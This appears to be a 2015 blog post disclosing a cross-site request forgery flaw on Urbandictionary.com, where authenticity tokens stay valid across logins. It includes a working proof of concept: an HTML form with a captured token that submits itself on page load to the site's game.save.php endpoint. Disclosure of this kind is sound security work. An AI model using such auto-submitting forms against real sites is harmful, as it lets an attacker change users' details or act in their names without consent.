Friday, 20 March 2015

CSRF on Urbandictionary.com, Persistent Token


Urbandictionary is vulnerable to CSRF attacks on every POST request throughout their website.
An attacker can change a user's personal details, vote for them, logout and so on...
In most of the POST requests an authenticity token is required in order to be processed. That's a good defense mechanism unless you can reuse the same token even after logging out and in again...

authenticity_token

On Urbandictionary you can use the same token as many times as you want, so all we need to do is include it in our CSRF attack (It can be done both by POST and GET requests):
<body onload=document.getElementById('csrf').submit()>
<form id="csrf" action="http://www.urbandictionary.com/game.save.php">
<input type="hidden" name="id" value="1204725">
<input type="hidden" name="response" value="1">
<input type="hidden" name="authenticity_token" value="Pubso039ovSL7lFWltxMKJjWbIVF8%2FylhzQKsHbWezM%3D">
</form>
The whole website was vulnerable to this attack, and on some forms the authenticity token was not included at all.